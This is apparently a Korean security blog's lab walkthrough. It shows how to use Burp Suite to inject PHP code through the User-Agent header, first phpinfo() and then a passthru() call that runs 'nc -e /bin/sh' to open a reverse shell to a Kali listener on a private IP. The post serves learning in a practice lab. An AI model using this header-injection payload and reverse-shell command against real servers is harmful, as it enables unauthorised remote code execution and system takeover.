burpsuite 실행
동의
Proxy -> Options
본인의 아이피인 루프백주소와 포트8080을 사용한다는 것 확인
Firefox 실행
설정
루프백주소와 포트번호 입력
Proxy -> Intercept
활성화가 되어있는지 확인
url 재입력
prxoy를 활성화를 한 뒤 주소창을 재입력
Proxy -> Intercept -> Headers
헤더에 들어간 후 User-Agent 의 값을 <?php phpinfo() ?>로 변경해줍니다
Forward
쿠키/캐시 삭제
만약 아무런 변화가 없다면 데이터를 삭제해줍니다
접속 후 모습
웹서버의 모든 정보들을 확인할 수 있습니다
allow_url_include
allow_url_include가 만약 on으로 되어 있다면 url을 통해 파일을 업로드 할 수 있습니다
passthru() 함수를 이용하여 외부에서 원격으로 프로그램을 수정해보겠습니다
kali
netcat -h
줄여서 nc -h 라고 입력해도 됩니다
옵션을 볼 수 있어 모르는경우 -h 옵션을 주어 확인해줍니다
-l : 포트를 열어주겠다는 뜻
-p : 사용할 포트번호
netstat -ant | grep 2222
터미널을 하나 더 열어 포트가 잘 열려있는지 확인해줍니다
다시한번 주소입력
<?php passthru("nc -e /bin/sh 192.168.1.120 2222") ?>
칼리 자신의 아이피를 적은 후 아까 열어둔 포트를 적어줍니다
Forward 하신후 off 해주셔도 됩니다
접속완료
접속이 되신다면 파일 생성 및 제거 확인 전부 가능합니다
'Web보안' 카테고리의 다른 글
LFI 취약점을 통한 공격연습 (0) | 2019.04.05 |
---|---|
dirb 웹퍼징 및 mutillidae 데이터베이스 변경 (0) | 2019.04.05 |
Maltego 사용법 (0) | 2019.04.04 |
여러 방법으로 서브도메인 알아보기 (0) | 2019.03.30 |
kali vmtools download (0) | 2019.03.29 |